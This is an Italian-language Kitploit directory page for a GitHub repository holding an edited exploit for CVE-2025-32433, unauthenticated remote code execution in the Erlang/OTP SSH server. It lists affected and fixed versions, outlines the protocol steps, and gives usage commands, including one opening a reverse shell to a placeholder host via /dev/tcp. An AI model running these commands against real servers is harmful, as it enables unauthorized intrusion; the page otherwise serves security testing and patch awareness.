Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433-Exploit-edited — Basato sulla versione originale:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Sostituisci il segno di spunta Unicode con un carattere ASCII per la compatibilità con Windows | Kitploit
Strumenti/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Basato sulla versione originale:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Sostituisci il segno di spunta Unicode con un carattere ASCII per la compatibilità con Windows

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit CVE-2025-32433 (Compatibile con Windows)

Esecuzione remota di codice non autenticata su SSH Erlang/OTP

Descrizione

Questo repository contiene un exploit per CVE-2025-32433, una vulnerabilità critica di esecuzione remota di codice non autenticata nel server SSH Erlang/OTP.

Caratteristiche principali:

  • ✅ Exploit RCE pre-autenticazione
  • ✅ Corretto per la compatibilità con la codifica GBK su Windows
  • ✅ Funziona sulle versioni Erlang/OTP ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Dettagli della vulnerabilità

CVE ID: CVE-2025-32433
Gravità: Critica
Impatto: Esecuzione remota di codice non autenticata

La vulnerabilità consente agli attaccanti di eseguire comandi di sistema arbitrari sui server SSH Erlang/OTP senza autenticazione, inviando messaggi di protocollo SSH appositamente modificati.

Versioni interessate

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

Utilizzo

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

Argomenti

root@kitploit:~
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute

Correzione della codifica per Windows

Questa versione corregge il problema di codifica presente nell'exploit originale:

Problema: L'exploit originale utilizzava il carattere Unicode di spunta (✓, U+2713) che causa errori di codifica GBK su Windows:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Soluzione: Sostituito il carattere Unicode con il carattere ASCII standard + per la compatibilità multipiattaforma.

Dettagli tecnici

L'exploit funziona nel seguente modo:

  1. Stabilire la connessione SSH e lo scambio del banner
  2. Inviare il pacchetto SSH_MSG_KEXINIT
  3. Aprire un canale SSH con SSH_MSG_CHANNEL_OPEN
  4. Inviare SSH_MSG_CHANNEL_REQUEST con un comando exec dannoso prima dell'autenticazione
  5. Eseguire codice Erlang arbitrario tramite os:cmd()

Riferimenti

  • Avviso di sicurezza GitHub
  • Fix del commit Erlang/OTP
  • RFC 4254 - Protocollo di connessione SSH
  • ProDefense CVE-2025-32433

Versioni corrette

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Dichiarazione di esclusione di responsabilità

Questo exploit è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. Usalo in modo responsabile e solo su sistemi su cui hai esplicita autorizzazione a effettuare test.

Licenza

Licenza MIT

Autore

Modificato per la compatibilità con Windows da chuzouX

Scarica lo strumento